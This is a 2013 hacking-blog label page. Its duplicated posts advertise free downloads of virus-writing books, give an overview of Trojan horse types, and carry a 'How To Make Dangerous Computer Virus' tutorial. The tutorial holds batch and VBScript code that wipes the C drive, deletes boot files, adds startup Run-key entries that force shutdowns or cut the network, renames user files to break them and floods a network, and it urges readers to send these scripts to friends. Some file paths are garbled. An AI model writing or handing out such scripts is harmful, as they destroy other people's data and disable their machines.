Introductory Video

Showing posts with label Dangerous Computer Virus. Show all posts
Showing posts with label Dangerous Computer Virus. Show all posts

Thursday, 8 August 2013

, , , ,

The Giant Black Book of Computer Viruses Free Ebook Download

The Giant Black Book of Computer Viruses


Hi Guys.In My Previous post i give you  The Little Black Book of Computer Viruses - Black Book of Viruses and Hacking.Now Today i give you The  Giant Black Book of Computer Viruses.This book will simply and plainly teach you how to write computer viruses. It is not one of those all too common books that decry viruses and call for secrecy about the technology they employ, while curiously giving you just enough technical details about viruses so you don’t feel like you’ve been cheated. Rather, this book is technical and to the point. This definitive work on computer viruses discusses the techniques modern viruses use to propagate, evade anti-virus software, cause damage, & compromise system security. Unlike most works on the subject, THE GIANT BLACK BOOK doesn't stop short of giving the reader what he needs to fully understand the subject. It is a technical work which contains complete, fully-functional commented code & explanations of more than 37 computer viruses & 3 anti-virus programs, alone with detailed discussions of stealth technology, polymorphism, evolutionary viruses & good viruses. 

or

Download Here

Click Here To See New Hacking Updates

Warning 
Use This Book Only For your security and education purpose otherwise i'm not responsible 
, , , ,

The Giant Black Book of Computer Viruses Free Ebook Download

The Giant Black Book of Computer Viruses


Hi Guys.In My Previous post i give you  The Little Black Book of Computer Viruses - Black Book of Viruses and Hacking.Now Today i give you The  Giant Black Book of Computer Viruses.This book will simply and plainly teach you how to write computer viruses. It is not one of those all too common books that decry viruses and call for secrecy about the technology they employ, while curiously giving you just enough technical details about viruses so you don’t feel like you’ve been cheated. Rather, this book is technical and to the point. This definitive work on computer viruses discusses the techniques modern viruses use to propagate, evade anti-virus software, cause damage, & compromise system security. Unlike most works on the subject, THE GIANT BLACK BOOK doesn't stop short of giving the reader what he needs to fully understand the subject. It is a technical work which contains complete, fully-functional commented code & explanations of more than 37 computer viruses & 3 anti-virus programs, alone with detailed discussions of stealth technology, polymorphism, evolutionary viruses & good viruses. 

Monday, 5 August 2013

, , ,

The Little Black Book Of Computer Viruses And Hacking Free Download

The Little Black Book Of Computer Viruses


Hi Guys.In My Previous post i give you social engineering art of human hacking Ebook.Now today i give you The little black Book Of Computer Viruses And Hacking.This is the first in a series of three books about computer viruses. In these volumes I want to challenge you to think in new ways about viruses, and break down false concepts and wrong ways of thinking, and go on from there to discuss the relevance of computer viruses in today’s world. These books are not a call to a witch hunt, or manuals for protecting yourself from viruses. On the contrary, they will teach you how to design viruses, deploy them, and make them better. All three volumes are full of source code for viruses, including both new and well known varieties.Now download first Volume of this book click on read more.


Download Here

Click Here To See New Updates

Warning
Use this post only for your security and education purpose otherwise i'm not responsible
, , ,

The Little Black Book Of Computer Viruses And Hacking Free Download

The Little Black Book Of Computer Viruses


Hi Guys.In My Previous post i give you social engineering art of human hacking Ebook.Now today i give you The little black Book Of Computer Viruses And Hacking.This is the first in a series of three books about computer viruses. In these volumes I want to challenge you to think in new ways about viruses, and break down false concepts and wrong ways of thinking, and go on from there to discuss the relevance of computer viruses in today’s world. These books are not a call to a witch hunt, or manuals for protecting yourself from viruses. On the contrary, they will teach you how to design viruses, deploy them, and make them better. All three volumes are full of source code for viruses, including both new and well known varieties.Now download first Volume of this book click on read more.

Tuesday, 30 July 2013

, , , , ,

Trojan Horse Computer Virus And Types of Trojan Horse Viruses

Trojan Horse Virus


Hi Guys.Today i tell you what is Trojan horse and his types.A Trojan horse or Trojan, is a non-self-replicating type of malware which gains privileged access to the operating system while appearing to perform a desirable function but instead drops a malicious payload, often including a backdoor allowing unauthorized access to the target's computer. These back doors tend to be invisible to average users, but may cause the computer to run slow. Trojans do not attempt to inject themselves into other files like a computer virus.

 
Trojan horses may steal information, or harm their host computer systems.Trojans may use drive-by downloads or install via online games or internet-driven applications in order to reach target computers. The term is derived from the Trojan Horse story in Greek mythology because Trojan horses employ a form of “social engineering,” presenting themselves as harmless, useful gifts, in order to persuade victims to install them on their computers.
A Trojan may give a hacker remote access to a targeted computer system. Operations that could be performed by a hacker on a targeted computer system may include:
  • Crashing the computer
  • Blue screen of death
  • Electronic money theft
  • Disabling all internet traffic on the host
  • Data theft
  • Keystroke logging
  • Watching the user's screen
  • Viewing the user's webcam
  • Controlling the computer system remotely
Trojan horses in this way may require interaction with a hacker to fulfill their purpose, though the hacker does not have to be the individual responsible for distributing the Trojan horse. It is possible for individual hackers to scan computers on a network using a port scanner in the hope of finding one with a malicious Trojan horse installed, which the hacker can then use to control the target computer.
A recent innovation in Trojan horse code takes advantage of a security flaw in older versions of Internet Explorer and Google Chrome to use the host computer as an anonymizer proxy to effectively hide internet usage.A hacker is able to view internet sites while the tracking cookies, internet history, and any IP logging are maintained on the host computer. The host's computer may or may not show the internet history of the sites viewed using the computer as a proxy. The first generation of anonymizer Trojan horses tended to leave their tracks in the page view histories of the host computer. Newer generations of the Trojan horse tend to "cover" their tracks more efficiently. Several versions of Sub7 have been widely circulated in the US and Europe and are the most widely distributed examples of this type of Trojan horse.

Common Trojan horses

  • Netbus (by Carl-Fredrik Neikter)
  • Subseven or Sub7(by Mobman)
  • Back Orifice (Sir Dystic)
  • Beast
  • Zeus
  • The Blackhole exploit kit
  • Flashback Trojan (Trojan BackDoor.Flashback)
  • ProRat
  • ZeroAccess

Types of Trojan Horse Viruses

1. The Remote Administration Trojan Horse Virus

This type of Trojan horse virus gives hacker behind the malware the possibility to gain control over the infected system. Often the remote administration Trojan horse virus functions without being identified. It can help the hacker to perform different functions including altering the registry, uploading or downloading of files, interrupting different types of communications between the infected computer and other machines.

2. The File Serving Trojan Horse Virus

Trojan horse viruses from this category are able to create a file server on the infected machine. Usually this server is configured as an FTP server and with its help the intruder will be able to control network connections, upload and download various files. These Trojan horse viruses are rather small in size, sometimes not more than 10Kb, which makes it difficult to detect them. They are often attached to emails or hidden in other files that users may download from the Internet. Regularly these Trojan viruses spread with the help of funny forwarded messages that a user receives from friends. Trojan horse viruses may also be hidden in small downloadable games. 

3. Distributed Denial of Service Attack Trojan Horse Virus

A lot of computers can be tricked intro installing the Distributed Denial of Service Trojan so that the hacker can gain control over one, several or all computers through a client that is connected with a master server. Using the primary computer within one huge zombie network of machines, hackers are able to sent attacks at particular targets, including companies and websites. They simply flood the target server with traffic, thus making it impossible for simple users to access certain websites or systems. Often these attacks are used to stop the activity of famous brands that could handle different financial demands. 

4. Keylogging Trojan Horse Virus

These Trojan horse viruses make use of spyware with the goal of recording every step of user's activity on the computer. They are called keylogging because they transmit to the hacker via email the information about logged and recorded keystrokes. Hackers use this type of malware for their financial benefit (through card fraud or identity theft). Some individuals or companies can offer a great reward for valuable information. 

5. The Password Stealing Trojan Horse Virus

The name speaks for itself - Trojans from this category are used to steal passwords. The Trojan transmits information about passwords to the hacker through email. Just like keylogging Trojans, this malware is used mainly for hacker's financial benefit (a lot of people use passwords to access their bank accounts or credit cards). 

6. The System Killing Trojan Horse Virus

These Trojans are meant to destroy everything in the system starting with drive Z and ending with drive A. One of the recent Trojan horse viruses of this type is called Trojan.Killfiles.904. The reasons for creating such Trojans are unknown but the results could be catastrophic.

 

Warning
Use this post only for your security and education purpose otherwise i'm not responsible
, , , , ,

Trojan Horse Computer Virus And Types of Trojan Horse Viruses

Trojan Horse Virus


Hi Guys.Today i tell you what is Trojan horse and his types.A Trojan horse or Trojan, is a non-self-replicating type of malware which gains privileged access to the operating system while appearing to perform a desirable function but instead drops a malicious payload, often including a backdoor allowing unauthorized access to the target's computer. These back doors tend to be invisible to average users, but may cause the computer to run slow. Trojans do not attempt to inject themselves into other files like a computer virus.

Saturday, 29 June 2013

, , , , ,

How To Make Dangerous Computer Virus ? 10 Most Famous Computer Viruses Codes

Dangerous Computer Virus


Hi Guys.Today i tell you how to make simple yet very powerful or you can say Harmful computer virus using a batch file.No software is required to make this Dangerous Computer virus, Notepad is enough for it. The good thing about this virus that is not detected by any AntiVirus.Therefor you can easly make this and use it any computer.You will create this virus using batch file programming. This virus will Delete the C Drive completely.
Lets Start.

1. Open Notepad ( Go to start > click on run > write notepad )
2. Now Copy below code in notepad

@Echo off
Del C:\ *.* |y

3. S
ave this file as Virus.bat

4. N
ow, running this file will delete all the content of C Drive.


Some New Viruses Codes


0.Convey your friend a little message and shut down his / her computer:


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it. 

1.Toggle your friend's Caps Lock button simultaneously:


Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

2.Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

3.This Virus Deletes All The Content Of C Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat 


4.This Will Crash your Computer
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs 
 

5.The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat 

6.Virus that crashes pc

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


7.Shutdowns Computer Everytime It Is Turned On


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


8.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save As Anything.bat

 
9.Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


10.System Meltdown


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE


Save As Anything.bat



11.Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

Note:

Please don't try to run on your own computer. it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer
.
, , , , ,

How To Make Dangerous Computer Virus ? 10 Most Famous Computer Viruses Codes

Dangerous Computer Virus


Hi Guys.Today i tell you how to make simple yet very powerful or you can say Harmful computer virus using a batch file.No software is required to make this Dangerous Computer virus, Notepad is enough for it. The good thing about this virus that is not detected by any AntiVirus.Therefor you can easly make this and use it any computer.You will create this virus using batch file programming. This virus will Delete the C Drive completely.
Lets Start.